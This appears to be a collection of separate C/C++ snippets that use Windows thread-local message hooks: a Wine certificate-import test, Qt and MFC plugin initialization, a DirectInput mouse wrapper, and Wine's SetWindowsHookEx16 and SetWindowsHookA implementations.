find_and_delete_cert_in_store(ca, info.u.pCertContext); ok(ret || broken(!ret) /* Win9x/NT4 */, "expected to find v1CertWithValidPubKey in CA store\n"); CertCloseStore(ca, 0); } } CertFreeCertificateContext(info.u.pCertContext); /* Imports the following cert--not self-signed, with a basic constraints2 * extensions--to the "AddressBook" store. Puts up a dialog at the end if * it succeeds or fails. */ info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING, iTunesCert3, sizeof(iTunesCert3)); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); if (ret) { static const WCHAR AddressBook[] = { 'A','d','d','r','e','s','s', 'B','o','o','k',0 }; HCERTSTORE addressBook = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0, CERT_SYSTEM_STORE_CURRENT_USER, AddressBook); if (addressBook) { ret = find_and_delete_cert_in_store(addressBook, info.u.pCertContext); ok(ret || broken(!ret), /* Windows 2000 and earlier */ "expected to find iTunesCert3 in AddressBook store\n"); CertCloseStore(addressBook, 0); } } /* Displays the wizard, but disables the "Certificate store" edit and * the Browse button. Confusingly, the "Place all certificates in the * following store" radio button is not disabled. */ if (0) { ret = pCryptUIWizImport(CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE, 0, NULL, &info, NULL); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); } store = CertOpenStore(CERT_STORE_PROV_MEMORY, X509_ASN_ENCODING, 0, CERT_STORE_CREATE_NEW_FLAG, NULL); /* Displays the wizard, but sets the "Certificate store" edit to the * string "Determined by the program", and disables it and the Browse * button, as well as the "Automatically select the certificate store * based on the type of certificate" radio button. */ if (0) { ret = pCryptUIWizImport(CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE, 0, NULL, &info, store); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); } ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE, 0, NULL, &info, store); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); ret = find_and_delete_cert_in_store(store, info.u.pCertContext); ok(ret || broken(!ret) /* Win9x/NT4 */, "expected to find iTunesCert3 in memory store\n"); CertFreeCertificateContext(info.u.pCertContext); CertCloseStore(store, 0); info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING, iTunesCert1, sizeof(iTunesCert1)); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); if (ret) { static const WCHAR AddressBook[] = { 'A','d','d','r','e','s','s', 'B','o','o','k',0 }; HCERTSTORE addressBook = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0, CERT_SYSTEM_STORE_CURRENT_USER, AddressBook); if (addressBook) { ret = find_and_delete_cert_in_store(addressBook, info.u.pCertContext); ok(ret || broken(!ret), /* Windows 2000 and earlier */ "expected to find iTunesCert1 in AddressBook store\n"); CertCloseStore(addressBook, 0); } } CertFreeCertificateContext(info.u.pCertContext); info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING, iTunesCert2, sizeof(iTunesCert2)); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); if (ret) { static const WCHAR CA[] = { 'C','A',0 }; HCERTSTORE ca = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0, CERT_SYSTEM_STORE_CURRENT_USER, CA); if (ca) { ret = find_and_delete_cert_in_store(ca, info.u.pCertContext); ok(ret || broken(!ret) /* Win9x/NT4 */, "expected to find iTunesCert2 in CA store\n"); CertCloseStore(ca, 0); } } CertFreeCertificateContext(info.u.pCertContext); info.u.hCertStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0, CERT_STORE_CREATE_NEW_FLAG, NULL); CertAddEncodedCertificateToStore(info.u.hCertStore, X509_ASN_ENCODING, v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey), CERT_STORE_ADD_ALWAYS, NULL); CertAddEncodedCRLToStore(info.u.hCertStore, X509_ASN_ENCODING, signedCRL, sizeof(signedCRL), CERT_STORE_ADD_ALWAYS, NULL); info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CERT_STORE; /* The ALLOW flags aren't allowed with a store as the source if the source * contains types other than those allowed. */ store = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0, CERT_STORE_CREATE_NEW_FLAG, NULL); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT, 0, NULL, &info, store); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL, 0, NULL, &info, store); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE | CRYPTUI_WIZ_IMPORT_ALLOW_CERT | CRYPTUI_WIZ_IMPORT_ALLOW_CRL, 0, NULL, &info, store); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); if (ret) { count = 0; cert = NULL; do { cert = CertEnumCertificatesInStore(store, cert); if (cert) count++; } while (cert); ok(count == 1, "expected 1 cert, got %d\n", count); count = 0; crl = NULL; do { crl = CertEnumCRLsInStore(store, crl); if (crl) count++; } while (crl); ok(count == 1, "expected 1 CRL, got %d\n", count); } CertCloseStore(store, 0); CertCloseStore(info.u.hCertStore, 0); /* If the ALLOW flags match the content of the store, the store can be * imported. */ info.u.hCertStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0, CERT_STORE_CREATE_NEW_FLAG, NULL); CertAddEncodedCertificateToStore(info.u.hCertStore, X509_ASN_ENCODING, v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey), CERT_STORE_ADD_ALWAYS, NULL); store = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0, CERT_STORE_CREATE_NEW_FLAG, NULL); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT, 0, NULL, &info, store); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); if (ret) { count = 0; cert = NULL; do { cert = CertEnumCertificatesInStore(store, cert); if (cert) count++; } while (cert); ok(count == 1, "expected 1 cert, got %d\n", count); count = 0; crl = NULL; do { crl = CertEnumCRLsInStore(store, crl); if (crl) count++; } while (crl); ok(count == 0, "expected 0 CRLs, got %d\n", count); } SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL, 0, NULL, &info, store); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); CertCloseStore(store, 0); CertCloseStore(info.u.hCertStore, 0); /* Again, if the ALLOW flags match the content of the store, the store can * be imported. */ info.u.hCertStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0, CERT_STORE_CREATE_NEW_FLAG, NULL); CertAddEncodedCRLToStore(info.u.hCertStore, X509_ASN_ENCODING, signedCRL, sizeof(signedCRL), CERT_STORE_ADD_ALWAYS, NULL); store = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0, CERT_STORE_CREATE_NEW_FLAG, NULL); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL, 0, NULL, &info, store); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); if (ret) { count = 0; cert = NULL; do { cert = CertEnumCertificatesInStore(store, cert); if (cert) count++; } while (cert); ok(count == 0, "expected 0 certs, got %d\n", count); count = 0; crl = NULL; do { crl = CertEnumCRLsInStore(store, crl); if (crl) count++; } while (crl); ok(count == 1, "expected 1 CRL, got %d\n", count); } SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT, 0, NULL, &info, store); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); CertCloseStore(store, 0); CertCloseStore(info.u.hCertStore, 0); UnhookWindowsHookEx(hook); }
extern "C" NPError NPP_SetWindow(NPP instance, NPWindow* window) { if (!qNP) qNP = QNPlugin::create(); NPError result = NPERR_NO_ERROR; _NPInstance* This; if (instance == NULL) return NPERR_INVALID_INSTANCE_ERROR; This = (_NPInstance*) instance->pdata; // take a shortcut if all that was changed is the geometry if ( This->widget && window #ifdef Q_WS_X11 && This->window == (Window) window->window #endif #ifdef Q_WS_WIN && This->window == (HWND) window->window #endif ) { This->x = window->x; This->y = window->y; This->width = window->width; This->height = window->height; This->widget->resize( This->width, This->height ); return result; } delete This->widget; if ( !window ) return result; #ifdef Q_WS_X11 This->window = (Window) window->window; This->display = ((NPSetWindowCallbackStruct *)window->ws_info)->display; #endif #ifdef Q_WS_WIN This->window = (HWND) window->window; #endif This->x = window->x; This->y = window->y; This->width = window->width; This->height = window->height; if (!qApp) { #ifdef Q_WS_X11 // We are the first Qt-based plugin to arrive event_loop = new QNPXt( "qnp", XtDisplayToApplicationContext(This->display) ); application = new QApplication(This->display); #endif #ifdef Q_WS_WIN static int argc=0; static char **argv={ 0 }; application = new QApplication( argc, argv ); #ifdef UNICODE if ( qWinVersion() & Qt::WV_NT_based ) hhook = SetWindowsHookExW( WH_GETMESSAGE, FilterProc, 0, GetCurrentThreadId() ); else #endif hhook = SetWindowsHookExA( WH_GETMESSAGE, FilterProc, 0, GetCurrentThreadId() ); #endif } #ifdef Q_WS_X11 if ( !original_x_errhandler ) original_x_errhandler = XSetErrorHandler( dummy_x_errhandler ); #endif // New widget on this new window. next_pi = This; /* This->widget = */ // (happens sooner - in QNPWidget constructor) This->instance->newWindow(); if ( !This->widget ) return result; #ifdef Q_WS_X11 This->widget->resize( This->width, This->height ); XReparentWindow( This->widget->x11Display(), This->widget->winId(), This->window, 0, 0 ); XSync( This->widget->x11Display(), False ); #endif #ifdef Q_WS_WIN LONG oldLong = GetWindowLong(This->window, GWL_STYLE); ::SetWindowLong(This->window, GWL_STYLE, oldLong | WS_CLIPCHILDREN | WS_CLIPSIBLINGS); ::SetWindowLong( This->widget->winId(), GWL_STYLE, WS_CHILD | WS_CLIPCHILDREN | WS_CLIPSIBLINGS ); ::SetParent( This->widget->winId(), This->window ); This->widget->raise(); This->widget->setGeometry( 0, 0, This->width, This->height ); #endif This->widget->show(); return result; }
{ if (dwReason == DLL_PROCESS_ATTACH) QMfcApp::pluginInstance(hInstance); return TRUE; } \endcode */ bool pluginInstance(Qt::HANDLE plugin) { if (qApp) return FALSE; QT_WA({ hhook = SetWindowsHookExW(WH_GETMESSAGE, QtFilterProc, 0, GetCurrentThreadId()); }, { hhook = SetWindowsHookExA(WH_GETMESSAGE, QtFilterProc, 0, GetCurrentThreadId()); }); int argc = 0; (void)new QApplication(argc, 0); if (plugin) { char filename[256]; if (GetModuleFileNameA((HINSTANCE)plugin, filename, 255)) LoadLibraryA(filename); } return TRUE; }
bool WrapperSystem::Init( HANDLE mod_hnd ) { char dinputDllName[ MAX_PATH ]; // returns with system32 even on win64 32bit mode, but image loader solves it GetSystemDirectoryA( dinputDllName, MAX_PATH ); button6ShutdownEvent.Clear( ); button6ShutdownEvent.SetType( type_button_6 ); button6ShutdownEvent.usButtonFlags = 0x800; button6ShutdownEvent.usButtonData = 0; button7ShutdownEvent.Clear( ); button7ShutdownEvent.SetType( type_button_7 ); button7ShutdownEvent.usButtonFlags = 0x800; button7ShutdownEvent.usButtonData = 0; memset( immediateBuffer, 0, sizeof( LONG ) * type_list_size ); bufferedMode = false; #ifdef DI_WRAPPER8 strcat( dinputDllName, "\\dinput8.dll" ); #else strcat( dinputDllName, "\\dinput.dll" ); #endif dinputDll = LoadLibraryA( dinputDllName ); // MSDN: If the function succeeds, the return value is greater than 31. if( dinputDll > ( HMODULE )31 ) { #ifdef DI_WRAPPER8 DirectInput8Create = ( DIRECTINPUT8CREATEPROC )GetProcAddress( dinputDll, "DirectInput8Create" ); if( !DirectInput8Create ) { #else DirectInputCreateA = ( DIRECTINPUTCREATEAPROC )GetProcAddress( dinputDll, "DirectInputCreateA" ); if( !DirectInputCreateA ) { #endif Shutdown( ); return false; } wrapperModule = mod_hnd; return true; } return false; } void WrapperSystem::Shutdown( ) { for( WrapperList::iterator wrpItr = wrappers.begin( ); wrpItr != wrappers.end( ); wrpItr++ ) { delete *wrpItr; } bufferedMode = false; if( hookHandleGetMessage ) { UnhookWindowsHookEx( hookHandleGetMessage ); hookHandleGetMessage = 0; } if( hookHandleCallWnd ) { UnhookWindowsHookEx( hookHandleCallWnd ); hookHandleCallWnd = 0; } FreeLibrary( dinputDll ); } void WrapperSystem::InitHID( HWND & h_wnd ) { RECT windowRect = { 0 }; if( hidInitialized ) return; // jk2 sends a null hwnd, and RegisterRawInputDevices fails without it, so grab one with GetForegroundWindow if( !h_wnd ) { h_wnd = GetForegroundWindow( ); } RAWINPUTDEVICE Rid; Rid.usUsagePage = HID_USAGE_PAGE_GENERIC; Rid.usUsage = HID_USAGE_GENERIC_MOUSE; Rid.dwFlags = RIDEV_INPUTSINK; Rid.hwndTarget = h_wnd; if( !RegisterRawInputDevices( &Rid, 1, sizeof( RAWINPUTDEVICE ) ) ) return; // register our hook into the game main message loop if( !( hookHandleGetMessage = SetWindowsHookExA( WH_GETMESSAGE, WindowHookFuncGetMessage, ( HINSTANCE )wrapperModule, GetCurrentThreadId( ) ) ) ) return; if( !( hookHandleCallWnd = SetWindowsHookExA( WH_CALLWNDPROC, WindowHookFuncCallWnd, ( HINSTANCE )wrapperModule, GetCurrentThreadId( ) ) ) ) return; hidInitialized = true; }
/*********************************************************************** * SetWindowsHookEx (USER.291) */ HHOOK WINAPI SetWindowsHookEx16( INT16 id, HOOKPROC16 proc, HINSTANCE16 hInst, HTASK16 hTask ) { struct user_thread_info *thread_info = get_user_thread_info(); struct hook16_queue_info *info; HHOOK hook; int index = id - WH_MINHOOK; if (id < WH_MINHOOK || id > WH_MAXHOOK16) return 0; if (!hook_procs[index]) { FIXME( "hook type %d broken in Win16\n", id ); return 0; } if (!hTask) FIXME( "System-global hooks (%d) broken in Win16\n", id ); else if (hTask != GetCurrentTask()) { FIXME( "setting hook (%d) on other task not supported\n", id ); return 0; } if (!(info = thread_info->hook16_info)) { if (!(info = HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(*info) ))) return 0; thread_info->hook16_info = info; } if (info->hook[index]) { FIXME( "Multiple hooks (%d) for the same task not supported yet\n", id ); return 0; } if (!(hook = SetWindowsHookExA( id, hook_procs[index], 0, GetCurrentThreadId() ))) return 0; info->hook[index] = hook; info->proc[index] = proc; return hook; }
/*********************************************************************** * SetWindowsHookA (USER32.@) */ HHOOK WINAPI SetWindowsHookA( INT id, HOOKPROC proc ) { return SetWindowsHookExA( id, proc, 0, GetCurrentThreadId() ); }